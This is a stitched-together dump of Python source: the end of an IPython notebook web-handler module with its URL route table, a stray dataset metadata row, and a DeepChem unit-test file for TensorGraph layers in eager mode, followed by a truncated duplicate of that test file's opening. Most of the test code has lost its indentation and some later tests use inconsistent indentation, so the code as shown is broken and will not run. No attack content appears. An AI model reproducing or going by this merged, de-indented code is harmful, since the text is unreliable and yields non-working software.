        # kill_kernel=False is passed straight through to the template --
        # presumably it leaves any running kernel untouched; confirm in template.
        self.write(self.render_template('notebook.html',
            project=self.project,
            notebook_id=notebook_id,
            kill_kernel=False,
            mathjax_url=self.mathjax_url,
            )
        )
class NotebookRedirectHandler(IPythonHandler):
    """Redirect /name.ipynb URLs to the canonical /<notebook_id> URL."""
    @web.authenticated
    def get(self, notebook_name):
        """Resolve *notebook_name* via the manager's reverse mapping; 404 if absent."""
        # strip trailing .ipynb:
        notebook_name = os.path.splitext(notebook_name)[0]
        notebook_id = self.notebook_manager.rev_mapping.get(notebook_name, '')
        if notebook_id:
            url = url_path_join(self.settings.get('base_project_url', '/'), notebook_id)
            return self.redirect(url)
        else:
            raise HTTPError(404)
class NotebookCopyHandler(IPythonHandler):
    """Copy the notebook identified by *notebook_id*, then redirect to the copy."""
    @web.authenticated
    def get(self, notebook_id):
        # copy_notebook returns the id of the newly created duplicate.
        notebook_id = self.notebook_manager.copy_notebook(notebook_id)
        self.redirect(url_path_join(self.base_project_url, notebook_id))
#-----------------------------------------------------------------------------
# URL to handler mappings
#-----------------------------------------------------------------------------
# Notebook ids are UUID-like: five \w+ groups joined by dashes.
_notebook_id_regex = r"(?P<notebook_id>\w+-\w+-\w+-\w+-\w+)"
# Notebook names are any path ending in .ipynb.
_notebook_name_regex = r"(?P<notebook_name>.+\.ipynb)"
# Route table: (URL pattern, handler class) pairs for the Tornado app.
default_handlers = [
    (r"/new", NewHandler),
    (r"/%s" % _notebook_id_regex, NamedNotebookHandler),
    (r"/%s" % _notebook_name_regex, NotebookRedirectHandler),
    (r"/%s/copy" % _notebook_id_regex, NotebookCopyHandler),
]
| it | 0.490215 | 1.583061 | 2 |
deepchem/models/tensorgraph/tests/test_layers_eager.py | avimanyu786/deepchem | 0 | 13597 | import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_flatten(self):
"""Test invoking Flatten in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Flatten()(input)
assert result.shape == (5, 40)
def test_reshape(self):
"""Test invoking Reshape in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Reshape((100, 2))(input)
assert result.shape == (100, 2)
def test_cast(self):
"""Test invoking Cast in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 3)
result = layers.Cast(dtype=tf.float32)(input)
assert result.dtype == tf.float32
def test_squeeze(self):
"""Test invoking Squeeze in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 1, 4).astype(np.float32)
result = layers.Squeeze()(input)
assert result.shape == (5, 4)
def test_transpose(self):
"""Test invoking Transpose in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10, 4).astype(np.float32)
result = layers.Transpose((1, 2, 0))(input)
assert result.shape == (10, 4, 5)
def test_combine_mean_std(self):
"""Test invoking CombineMeanStd in eager mode."""
with context.eager_mode():
mean = np.random.rand(5, 3).astype(np.float32)
std = np.random.rand(5, 3).astype(np.float32)
layer = layers.CombineMeanStd(training_only=True, noise_epsilon=0.01)
result1 = layer(mean, std, training=False)
assert np.array_equal(result1, mean) # No noise in test mode
result2 = layer(mean, std, training=True)
assert not np.array_equal(result2, mean)
assert np.allclose(result2, mean, atol=0.1)
def test_repeat(self):
"""Test invoking Repeat in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 4).astype(np.float32)
result = layers.Repeat(3)(input)
assert result.shape == (5, 3, 4)
assert np.array_equal(result[:, 0, :], result[:, 1, :])
def test_gather(self):
"""Test invoking Gather in eager mode."""
with context.eager_mode():
input = np.random.rand(5).astype(np.float32)
indices = [[1], [3]]
result = layers.Gather()(input, indices)
assert np.array_equal(result, [input[1], input[3]])
def test_gru(self):
"""Test invoking GRU in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.GRU(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.GRU(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_lstm(self):
"""Test invoking LSTM in eager mode."""
with context.eager_mode():
batch_size = 10
n_hidden = 7
in_channels = 4
n_steps = 6
input = np.random.rand(batch_size, n_steps,
in_channels).astype(np.float32)
layer = layers.LSTM(n_hidden, batch_size)
result, state = layer(input)
assert result.shape == (batch_size, n_steps, n_hidden)
assert len(layer.trainable_variables) == 3
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.LSTM(n_hidden, batch_size)
result2, state2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3, state3 = layer(input)
assert np.allclose(result, result3)
# But if we specify a different starting state, that should produce a
# different result.
result4, state4 = layer(input, initial_state=state3)
assert not np.allclose(result, result4)
def test_time_series_dense(self):
"""Test invoking TimeSeriesDense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
n_steps = 6
batch_size = 10
input = np.random.rand(batch_size, n_steps, in_dim).astype(np.float32)
layer = layers.TimeSeriesDense(out_dim)
result = layer(input)
assert result.shape == (batch_size, n_steps, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.TimeSeriesDense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_l1_loss(self):
"""Test invoking L1Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L1Loss()(input1, input2)
expected = np.mean(np.abs(input1 - input2), axis=1)
assert np.allclose(result, expected)
def test_l2_loss(self):
"""Test invoking L2Loss in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.L2Loss()(input1, input2)
expected = np.mean((input1 - input2)**2, axis=1)
assert np.allclose(result, expected)
def test_softmax(self):
"""Test invoking SoftMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.SoftMax()(input)
expected = tf.nn.softmax(input)
assert np.allclose(result, expected)
def test_sigmoid(self):
"""Test invoking Sigmoid in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.Sigmoid()(input)
expected = tf.nn.sigmoid(input)
assert np.allclose(result, expected)
def test_relu(self):
"""Test invoking ReLU in eager mode."""
with context.eager_mode():
input = np.random.normal(size=(5, 10)).astype(np.float32)
result = layers.ReLU()(input)
expected = tf.nn.relu(input)
assert np.allclose(result, expected)
def test_concat(self):
"""Test invoking Concat in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Concat()(input1, input2)
assert result.shape == (5, 14)
assert np.array_equal(input1, result[:, :10])
assert np.array_equal(input2, result[:, 10:])
def test_stack(self):
"""Test invoking Stack in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 4).astype(np.float32)
input2 = np.random.rand(5, 4).astype(np.float32)
result = layers.Stack()(input1, input2)
assert result.shape == (5, 2, 4)
assert np.array_equal(input1, result[:, 0, :])
assert np.array_equal(input2, result[:, 1, :])
def test_constant(self):
"""Test invoking Constant in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
result = layers.Constant(value)()
assert np.array_equal(result, value)
def test_variable(self):
"""Test invoking Variable in eager mode."""
with context.eager_mode():
value = np.random.rand(5, 4).astype(np.float32)
layer = layers.Variable(value)
result = layer()
assert np.array_equal(result.numpy(), value)
assert len(layer.trainable_variables) == 1
def test_add(self):
"""Test invoking Add in eager mode."""
with context.eager_mode():
result = layers.Add()([1, 2], [3, 4])
assert np.array_equal(result, [4, 6])
def test_multiply(self):
"""Test invoking Multiply in eager mode."""
with context.eager_mode():
result = layers.Multiply()([1, 2], [3, 4])
assert np.array_equal(result, [3, 8])
def test_divide(self):
"""Test invoking Divide in eager mode."""
with context.eager_mode():
result = layers.Divide()([1, 2], [2, 5])
assert np.allclose(result, [0.5, 0.4])
def test_log(self):
"""Test invoking Log in eager mode."""
with context.eager_mode():
result = layers.Log()(2.5)
assert np.allclose(result, np.log(2.5))
def test_exp(self):
"""Test invoking Exp in eager mode."""
with context.eager_mode():
result = layers.Exp()(2.5)
assert np.allclose(result, np.exp(2.5))
def test_interatomic_l2_distances(self):
"""Test invoking InteratomicL2Distances in eager mode."""
with context.eager_mode():
atoms = 5
neighbors = 2
coords = np.random.rand(atoms, 3)
neighbor_list = np.random.randint(0, atoms, size=(atoms, neighbors))
layer = layers.InteratomicL2Distances(atoms, neighbors, 3)
result = layer(coords, neighbor_list)
assert result.shape == (atoms, neighbors)
for atom in range(atoms):
for neighbor in range(neighbors):
delta = coords[atom] - coords[neighbor_list[atom, neighbor]]
dist2 = np.dot(delta, delta)
assert np.allclose(dist2, result[atom, neighbor])
def test_sparse_softmax_cross_entropy(self):
"""Test invoking SparseSoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size).astype(np.int32)
result = layers.SparseSoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_softmax_cross_entropy(self):
"""Test invoking SoftMaxCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.rand(batch_size, n_features).astype(np.float32)
result = layers.SoftMaxCrossEntropy()(labels, logits)
expected = tf.nn.softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_sigmoid_cross_entropy(self):
"""Test invoking SigmoidCrossEntropy in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
logits = np.random.rand(batch_size, n_features).astype(np.float32)
labels = np.random.randint(0, 2,
(batch_size, n_features)).astype(np.float32)
result = layers.SigmoidCrossEntropy()(labels, logits)
expected = tf.nn.sigmoid_cross_entropy_with_logits(
labels=labels, logits=logits)
assert np.allclose(result, expected)
def test_reduce_mean(self):
"""Test invoking ReduceMean in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMean(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.mean(input, axis=1))
def test_reduce_max(self):
"""Test invoking ReduceMax in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceMax(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.max(input, axis=1))
def test_reduce_sum(self):
"""Test invoking ReduceSum in eager mode."""
with context.eager_mode():
input = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSum(axis=1)(input)
assert result.shape == (5,)
assert np.allclose(result, np.sum(input, axis=1))
def test_reduce_square_difference(self):
"""Test invoking ReduceSquareDifference in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.ReduceSquareDifference(axis=1)(input1, input2)
assert result.shape == (5,)
assert np.allclose(result, np.mean((input1 - input2)**2, axis=1))
def test_conv_2d(self):
"""Test invoking Conv2D in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d(self):
"""Test invoking Conv3D in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3D(filters, kernel_size=kernel_size)
result = layer(input)
assert result.shape == (batch_size, length, width, depth, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3D(filters, kernel_size=kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_2d_transpose(self):
"""Test invoking Conv2DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width,
in_channels).astype(np.float32)
layer = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv2DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_conv_3d_transpose(self):
"""Test invoking Conv3DTranspose in eager mode."""
with context.eager_mode():
length = 4
width = 5
depth = 6
in_channels = 2
filters = 3
kernel_size = 2
stride = 2
batch_size = 10
input = np.random.rand(batch_size, length, width, depth,
in_channels).astype(np.float32)
layer = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result = layer(input)
assert result.shape == (batch_size, length * stride, width * stride,
depth * stride, filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv3DTranspose(
filters, kernel_size=kernel_size, stride=stride)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_max_pool_1d(self):
"""Test invoking MaxPool1D in eager mode."""
with context.eager_mode():
input = np.random.rand(4, 6, 8).astype(np.float32)
result = layers.MaxPool1D(strides=2)(input)
assert result.shape == (4, 3, 8)
def test_max_pool_2d(self):
"""Test invoking MaxPool2D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8).astype(np.float32)
result = layers.MaxPool2D()(input)
assert result.shape == (2, 2, 3, 8)
def test_max_pool_3d(self):
"""Test invoking MaxPool3D in eager mode."""
with context.eager_mode():
input = np.random.rand(2, 4, 6, 8, 2).astype(np.float32)
result = layers.MaxPool3D()(input)
assert result.shape == (2, 2, 3, 4, 2)
def test_graph_conv(self):
"""Test invoking GraphConv in eager mode."""
with context.eager_mode():
out_channels = 2
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
layer = layers.GraphConv(out_channels)
result = layer(*args)
assert result.shape == (n_atoms, out_channels)
assert len(layer.trainable_variables) == 2 * layer.num_deg
def test_graph_pool(self):
"""Test invoking GraphPool in eager mode."""
with context.eager_mode():
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphPool()(*args)
assert result.shape[0] == n_atoms
# TODO What should shape[1] be? It's not documented.
def test_graph_gather(self):
"""Test invoking GraphGather in eager mode."""
with context.eager_mode():
batch_size = 2
n_features = 75
n_atoms = 4 # In CCC and C, there are 4 atoms
raw_smiles = ['CCC', 'C']
import rdkit
mols = [rdkit.Chem.MolFromSmiles(s) for s in raw_smiles]
featurizer = dc.feat.graph_features.ConvMolFeaturizer()
mols = featurizer.featurize(mols)
multi_mol = dc.feat.mol_graphs.ConvMol.agglomerate_mols(mols)
atom_features = multi_mol.get_atom_features().astype(np.float32)
degree_slice = multi_mol.deg_slice
membership = multi_mol.membership
deg_adjs = multi_mol.get_deg_adjacency_lists()[1:]
args = [atom_features, degree_slice, membership] + deg_adjs
result = layers.GraphGather(batch_size)(*args)
# TODO(rbharath): Why is it 2*n_features instead of n_features?
assert result.shape == (batch_size, 2 * n_features)
def test_lstm_step(self):
"""Test invoking LSTMStep in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_feat = 10
y = np.random.rand(n_test, 2 * n_feat).astype(np.float32)
state_zero = np.random.rand(n_test, n_feat).astype(np.float32)
state_one = np.random.rand(n_test, n_feat).astype(np.float32)
layer = layers.LSTMStep(n_feat, 2 * n_feat)
result = layer(y, state_zero, state_one)
h_out, h_copy_out, c_out = (result[0], result[1][0], result[1][1])
assert h_out.shape == (n_test, n_feat)
assert h_copy_out.shape == (n_test, n_feat)
assert c_out.shape == (n_test, n_feat)
assert len(layer.trainable_variables) == 3
def test_attn_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.AttnLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 7
def test_iter_ref_lstm_embedding(self):
"""Test invoking AttnLSTMEmbedding in eager mode."""
with context.eager_mode():
max_depth = 5
n_test = 5
n_support = 11
n_feat = 10
test = np.random.rand(n_test, n_feat).astype(np.float32)
support = np.random.rand(n_support, n_feat).astype(np.float32)
layer = layers.IterRefLSTMEmbedding(n_test, n_support, n_feat, max_depth)
test_out, support_out = layer(test, support)
assert test_out.shape == (n_test, n_feat)
assert support_out.shape == (n_support, n_feat)
assert len(layer.trainable_variables) == 12
def test_batch_norm(self):
"""Test invoking BatchNorm in eager mode."""
with context.eager_mode():
batch_size = 10
n_features = 5
input = np.random.rand(batch_size, n_features).astype(np.float32)
layer = layers.BatchNorm()
result = layer(input)
assert result.shape == (batch_size, n_features)
assert len(layer.trainable_variables) == 2
def test_weighted_error(self):
"""Test invoking WeightedError in eager mode."""
with context.eager_mode():
input1 = np.random.rand(5, 10).astype(np.float32)
input2 = np.random.rand(5, 10).astype(np.float32)
result = layers.WeightedError()(input1, input2)
expected = np.sum(input1 * input2)
assert np.allclose(result, expected)
def test_vina_free_energy(self):
"""Test invoking VinaFreeEnergy in eager mode."""
with context.eager_mode():
n_atoms = 5
m_nbrs = 1
ndim = 3
nbr_cutoff = 1
start = 0
stop = 4
X = np.random.rand(n_atoms, ndim).astype(np.float32)
Z = np.random.randint(0, 2, (n_atoms)).astype(np.float32)
layer = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(X, Z)
assert len(layer.trainable_variables) == 6
assert result.shape == tuple()
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.VinaFreeEnergy(n_atoms, m_nbrs, ndim, nbr_cutoff, start,
stop)
result2 = layer2(X, Z)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(X, Z)
assert np.allclose(result, result3)
  def test_weighted_linear_combo(self):
    """Test invoking WeightedLinearCombo in eager mode."""
    with context.eager_mode():
      input1 = np.random.rand(5, 10).astype(np.float32)
      input2 = np.random.rand(5, 10).astype(np.float32)
      layer = layers.WeightedLinearCombo()
      result = layer(input1, input2)
      assert len(layer.trainable_variables) == 2
      # NOTE(review): assumes trainable_variables[0]/[1] line up with the
      # order the inputs were passed -- confirm against WeightedLinearCombo.
      expected = input1 * layer.trainable_variables[0] + input2 * layer.trainable_variables[1]
      assert np.allclose(result, expected)
def test_neighbor_list(self):
"""Test invoking NeighborList in eager mode."""
with context.eager_mode():
N_atoms = 5
start = 0
stop = 12
nbr_cutoff = 3
ndim = 3
M_nbrs = 2
coords = start + np.random.rand(N_atoms, ndim) * (stop - start)
coords = tf.cast(tf.stack(coords), tf.float32)
layer = layers.NeighborList(N_atoms, M_nbrs, ndim, nbr_cutoff, start,
stop)
result = layer(coords)
assert result.shape == (N_atoms, M_nbrs)
def test_dropout(self):
"""Test invoking Dropout in eager mode."""
with context.eager_mode():
rate = 0.5
input = np.random.rand(5, 10).astype(np.float32)
layer = layers.Dropout(rate)
result1 = layer(input, training=False)
assert np.allclose(result1, input)
result2 = layer(input, training=True)
assert not np.allclose(result2, input)
nonzero = result2.numpy() != 0
assert np.allclose(result2.numpy()[nonzero], input[nonzero] / rate)
def test_atomic_convolution(self):
"""Test invoking AtomicConvolution in eager mode."""
with context.eager_mode():
batch_size = 4
max_atoms = 5
max_neighbors = 2
dimensions = 3
params = [[5.0, 2.0, 0.5], [10.0, 2.0, 0.5]]
input1 = np.random.rand(batch_size, max_atoms,
dimensions).astype(np.float32)
input2 = np.random.randint(
max_atoms, size=(batch_size, max_atoms, max_neighbors))
input3 = np.random.randint(
1, 10, size=(batch_size, max_atoms, max_neighbors))
layer = layers.AtomicConvolution(radial_params=params)
result = layer(input1, input2, input3)
assert result.shape == (batch_size, max_atoms, len(params))
assert len(layer.trainable_variables) == 3
def test_alpha_share_layer(self):
    """AlphaShareLayer should preserve shapes and be deterministic per instance."""
    with context.eager_mode():
        x = np.random.rand(10, 6).astype(np.float32)
        y = np.random.rand(10, 6).astype(np.float32)
        share = layers.AlphaShareLayer()
        first = share(x, y)
        assert x.shape == first[0].shape
        assert y.shape == first[1].shape
        # A fresh layer carries fresh random weights, so its outputs differ...
        other = layers.AlphaShareLayer()(x, y)
        assert not np.allclose(first[0], other[0])
        assert not np.allclose(first[1], other[1])
        # ...while re-invoking the original layer reproduces its outputs.
        again = share(x, y)
        assert np.allclose(first[0], again[0])
        assert np.allclose(first[1], again[1])
def test_sluice_loss(self):
    """SluiceLoss over these all-ones inputs should total exactly 40."""
    with context.eager_mode():
        ones_a = np.ones((3, 4), dtype=np.float32)
        ones_b = np.ones((2, 2), dtype=np.float32)
        loss = layers.SluiceLoss()(ones_a, ones_b)
        assert np.allclose(loss, 40.0)
def test_beta_share(self):
    """BetaShare should keep the input shape and be repeatable per instance."""
    with context.eager_mode():
        x = np.random.rand(10, 6).astype(np.float32)
        y = np.random.rand(10, 6).astype(np.float32)
        share = layers.BetaShare()
        first = share(x, y)
        assert x.shape == first.shape
        assert y.shape == first.shape
        # Fresh random weights in a new layer produce a different combination.
        assert not np.allclose(first, layers.BetaShare()(x, y))
        # The same layer applied twice is deterministic.
        assert np.allclose(first, share(x, y))
def test_ani_feat(self):
    """Test invoking ANIFeat in eager mode.

    This is only a smoke test: ANIFeat's output shape is undocumented and
    there are no other test cases for it, so we only verify that the call
    succeeds and produces a value.
    """
    with context.eager_mode():
        batch_size = 10
        max_atoms = 5
        # 4 features per atom; the exact layout is assumed from ANIFeat's
        # usage elsewhere -- TODO confirm against the layer implementation.
        input = np.random.rand(batch_size, max_atoms, 4).astype(np.float32)
        layer = layers.ANIFeat(max_atoms=max_atoms)
        result = layer(input)
        # TODO What should the output shape be?  It's not documented.
        # Until that is pinned down, at least assert the layer ran.
        assert result is not None
def test_graph_embed_pool_layer(self):
    """GraphEmbedPoolLayer should pool 100 vertices down to num_vertices."""
    with context.eager_mode():
        vertices = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
        adjacency = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
        pool = layers.GraphEmbedPoolLayer(num_vertices=6)
        first = pool(vertices, adjacency)
        # Pooled vertex features and pooled adjacency, both over 6 vertices.
        assert first[0].shape == (10, 6, 50)
        assert first[1].shape == (10, 6, 5, 6)
        # A second layer has different random weights, hence different output.
        other = layers.GraphEmbedPoolLayer(num_vertices=6)(vertices, adjacency)
        assert not np.allclose(first[0], other[0])
        assert not np.allclose(first[1], other[1])
        # The original layer stays deterministic across calls.
        again = pool(vertices, adjacency)
        assert np.allclose(first[0], again[0])
        assert np.allclose(first[1], again[1])
def test_graph_cnn(self):
    """GraphCNN should map vertex features to num_filters output channels."""
    with context.eager_mode():
        vertices = np.random.uniform(size=(10, 100, 50)).astype(np.float32)
        adjacency = np.random.uniform(size=(10, 100, 5, 100)).astype(np.float32)
        cnn = layers.GraphCNN(num_filters=6)
        first = cnn(vertices, adjacency)
        assert first.shape == (10, 100, 6)
        # Different random weights in a fresh layer change the output.
        other = layers.GraphCNN(num_filters=6)(vertices, adjacency)
        assert not np.allclose(first, other)
        # Re-evaluating the same layer is deterministic.
        assert np.allclose(first, cnn(vertices, adjacency))
def test_hinge_loss(self):
    """HingeLoss should return one loss value per label."""
    with context.eager_mode():
        n_labels = 1
        # NOTE(review): hinge loss conventionally expects labels in {-1, +1};
        # values in [0, 1) still exercise the shape contract checked here.
        logits = np.random.rand(n_labels).astype(np.float32)
        labels = np.random.rand(n_labels).astype(np.float32)
        result = layers.HingeLoss()(labels, logits)
        assert result.shape == (n_labels,)
| import deepchem as dc
import numpy as np
import tensorflow as tf
import deepchem.models.tensorgraph.layers as layers
from tensorflow.python.eager import context
from tensorflow.python.framework import test_util
class TestLayersEager(test_util.TensorFlowTestCase):
"""
Test that layers function in eager mode.
"""
def test_conv_1d(self):
"""Test invoking Conv1D in eager mode."""
with context.eager_mode():
width = 5
in_channels = 2
filters = 3
kernel_size = 2
batch_size = 10
input = np.random.rand(batch_size, width, in_channels).astype(np.float32)
layer = layers.Conv1D(filters, kernel_size)
result = layer(input)
self.assertEqual(result.shape[0], batch_size)
self.assertEqual(result.shape[2], filters)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Conv1D(filters, kernel_size)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_dense(self):
"""Test invoking Dense in eager mode."""
with context.eager_mode():
in_dim = 2
out_dim = 3
batch_size = 10
input = np.random.rand(batch_size, in_dim).astype(np.float32)
layer = layers.Dense(out_dim)
result = layer(input)
assert result.shape == (batch_size, out_dim)
assert len(layer.trainable_variables) == 2
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Dense(out_dim)
result2 = layer2(input)
assert not np.allclose(result, result2)
# But evaluating the first layer again should produce the same result as before.
result3 = layer(input)
assert np.allclose(result, result3)
def test_highway(self):
"""Test invoking Highway in eager mode."""
with context.eager_mode():
width = 5
batch_size = 10
input = np.random.rand(batch_size, width).astype(np.float32)
layer = layers.Highway()
result = layer(input)
assert result.shape == (batch_size, width)
assert len(layer.trainable_variables) == 4
# Creating a second layer should produce different results, since it has
# different random weights.
layer2 = layers.Highway()
result2 = layer2(input)
